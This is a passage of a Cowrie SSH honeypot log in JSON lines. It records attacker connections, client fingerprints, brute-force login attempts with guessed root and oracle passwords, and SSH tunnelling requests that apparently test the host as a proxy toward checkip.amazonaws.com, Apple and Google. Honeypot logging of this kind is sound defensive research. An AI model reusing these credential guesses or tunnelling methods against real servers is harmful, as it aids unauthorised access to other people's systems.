2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:32:36.127279Z","src_ip":"196.251.86.249","session":"c1c6f8b80c80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54888,"dst_ip":"1.2.3.4","dst_port":22,"session":"e17241440c71","protocol":"ssh","message":"New connection: 212.227.235.229:54888 (1.2.3.4:22) [session: e17241440c71]","sensor":"my-vps","timestamp":"2025-08-26T10:32:36.344581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:32:36.346344Z","src_ip":"212.227.235.229","session":"e17241440c71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:32:36.627732Z","src_ip":"212.227.235.229","session":"e17241440c71"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:32:37.738107Z","src_ip":"212.227.235.229","session":"e17241440c71"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"111111","message":"login attempt [oracle/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T10:32:37.922128Z","src_ip":"196.251.86.249","session":"c1c6f8b80c80"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:38.018875Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:38.019733Z","src_ip":"212.227.235.229","session":"e17241440c71"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:39.446299Z","src_ip":"196.251.86.249","session":"c1c6f8b80c80"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":48130,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e8ebcbc021b","protocol":"ssh","message":"New connection: 194.0.234.21:48130 (1.2.3.4:22) [session: 4e8ebcbc021b]","sensor":"my-vps","timestamp":"2025-08-26T10:33:02.207580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T10:33:02.208488Z","src_ip":"194.0.234.21","session":"4e8ebcbc021b"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T10:33:02.225308Z","src_ip":"194.0.234.21","session":"4e8ebcbc021b"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:33:02.310152Z","src_ip":"194.0.234.21","session":"4e8ebcbc021b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45062,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b8f9f1001bd","protocol":"ssh","message":"New connection: 212.227.235.229:45062 (1.2.3.4:22) [session: 5b8f9f1001bd]","sensor":"my-vps","timestamp":"2025-08-26T10:33:03.638984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:33:03.639905Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:33:03.853091Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.77.155.121","dst_port":443,"src_ip":"194.0.234.21","src_port":50586,"message":"direct-tcp connection request to 54.77.155.121:443 from 127.0.0.1:50586","sensor":"my-vps","timestamp":"2025-08-26T10:33:03.862919Z","session":"4e8ebcbc021b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.77.155.121","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa7%\\xe9w\\xb1\\xb8\\x96\\xb1\\xad2\\xf0\\xc9\\x80\\xee\\xcf\\xcbG\\x1b\\x7f/W\\xac?#\\xfe%\\x0c\\xa6\\xe9\\x81\\xe4\\xea \\xd7\\xd8\\x0f\\x03\\x7f\\xd345A\\xb0\\xc3c\\x8f\\xe5\\x98\\t\\t\\xafM\\xb1\\x83\\xf4@|\\xe9\\xec\\xd3\\xc7\\x84\\x1cp\\xe0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc3\\xd1\\x87\\x80v\\xdb\\xc3~\\xee,l\\xb3\\xc9\\x985\\x0f\\xa3\\t\\x1a\\xa3&fL\\xd7\\xbe\\x04\\xe0\\x90\\xe2\\xaa\\x7fN\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.77.155.121:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa7%\\xe9w\\xb1\\xb8\\x96\\xb1\\xad2\\xf0\\xc9\\x80\\xee\\xcf\\xcbG\\x1b\\x7f/W\\xac?#\\xfe%\\x0c\\xa6\\xe9\\x81\\xe4\\xea \\xd7\\xd8\\x0f\\x03\\x7f\\xd345A\\xb0\\xc3c\\x8f\\xe5\\x98\\t\\t\\xafM\\xb1\\x83\\xf4@|\\xe9\\xec\\xd3\\xc7\\x84\\x1cp\\xe0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc3\\xd1\\x87\\x80v\\xdb\\xc3~\\xee,l\\xb3\\xc9\\x985\\x0f\\xa3\\t\\x1a\\xa3&fL\\xd7\\xbe\\x04\\xe0\\x90\\xe2\\xaa\\x7fN\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T10:33:03.891147Z","src_ip":"194.0.234.21","session":"4e8ebcbc021b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.76.24.222","dst_port":443,"src_ip":"194.0.234.21","src_port":50666,"message":"direct-tcp connection request to 104.76.24.222:443 from 127.0.0.1:50666","sensor":"my-vps","timestamp":"2025-08-26T10:33:03.911489Z","session":"4e8ebcbc021b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.76.24.222","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03V\\xd2\\xd8b\\xee\\x00\\x1e\\xd1}\\xe2\\x9c\\r\\xcfL\\xec@\\x85\\xa6S\\xce\\xcc\\x1a\\x9c\\x9d\\x84#Q\\x15|\\x1d\\xd2\\x08 \\x86~\\x0f\\xf2oG\\x84\\xb4\\x92\\r]\\xfc\\x86JJAw\\xf1\\xbfr\\x88<\\xfd\\xd1G\\xdc>(\\xb1\\xcc\\xbf\\x88\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 SNL\\xb5\\xfd##uE7\\xf6\\xb9g\\x13y\\x16'\\xdc1%&F\\x0f\\x8d\\xfa\\xd8\\xa2\\x16b\\xf9( \\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 104.76.24.222:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03V\\xd2\\xd8b\\xee\\x00\\x1e\\xd1}\\xe2\\x9c\\r\\xcfL\\xec@\\x85\\xa6S\\xce\\xcc\\x1a\\x9c\\x9d\\x84#Q\\x15|\\x1d\\xd2\\x08 \\x86~\\x0f\\xf2oG\\x84\\xb4\\x92\\r]\\xfc\\x86JJAw\\xf1\\xbfr\\x88<\\xfd\\xd1G\\xdc>(\\xb1\\xcc\\xbf\\x88\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 SNL\\xb5\\xfd##uE7\\xf6\\xb9g\\x13y\\x16'\\xdc1%&F\\x0f\\x8d\\xfa\\xd8\\xa2\\x16b\\xf9( \\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T10:33:04.100798Z","src_ip":"194.0.234.21","session":"4e8ebcbc021b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"194.0.234.21","src_port":50832,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:50832","sensor":"my-vps","timestamp":"2025-08-26T10:33:04.175303Z","session":"4e8ebcbc021b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x84\\xa0\\x8d$K\\xc9%\\xde2 #\\xcb(\\xfa\\x12\\xe5\\t\\xa2'\\xb9JX\\x17\\xc2\\t\\xa7;[\\x85F\\xbfA \\x17\\x8f\\x7f+ig\\xfdH\\x95+\\xfd\\xe27\\xaa\\x1eu\\x1f\\xd7\\xe5\\xf1\\xfb\\x07\\x15E@2\\xab\\x18\\xfd\\xc7\\xaa\\xbf\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x86\\x91c\\xfdP%|\\xa0\\xe2)\\xfa<?\\x95U\\xe6\\x12g\\xf0\\xcd\\xee 0\\xd4p\\x0b\\xa8\\xacdP\\x0b\\x13\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0